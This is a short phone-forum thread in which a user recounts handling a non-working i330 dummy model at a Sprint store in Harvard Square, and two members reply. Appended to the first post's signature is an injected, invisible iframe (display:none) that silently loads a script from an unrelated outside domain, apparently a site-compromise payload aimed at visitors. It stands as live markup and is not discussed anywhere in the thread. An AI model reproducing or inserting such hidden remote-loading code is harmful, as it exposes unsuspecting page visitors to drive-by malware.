+ Reply to Thread

Thumbs up i330 Dummy Model in Sprint Store!

Hey Folks,

I've been lurking on these forums for months patiently awaiting the release of the i330. Today I was inspired to register (and make my first post!) after visiting the Sprint Store in Harvard Square, Cambridge, MA.

I went in (as I do whenever I pass through Harvard Square) and asked the sales rep if he had heard anything about the i330 release and he said he had heard nothing. He seemed kind of clueless. When I pressed him for more info he said, out of the blue, "Would you like to see a non-working model? I have one in back."

I said, "Um... Yes."

He came out with it and handed it to me. It felt great. The screen was a dummy screen but everything else felt pretty real. It was heavier than I thought it would be and that was kind of nice. It felt dense and sturdy. Even the buttons worked.

While I was admiring it, he searched his system and said... "Oh, look, it's in our system. Looks like it will be $499, just like the i300." He had no other info, specs or anything. I asked him when he got the non-working model and he said it had been in the back room for about a week.

He did tell me that there was a Sprint Rep trade show in Connecticut on November 4th that he was attending and that supposedly all the "new stuff" was going to be there and the reps would all be introduced to it. He took my email address and told me he'd send me any interesting news after the conference.

Whoo hoo!

Jim<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Thanks for the update and glad to have you as a member of the brother/sisterhood.

BTW...you do realize that this means you must post regularly don't you?

Administrator

Arrow

hmmm. nice info... thanks for the post!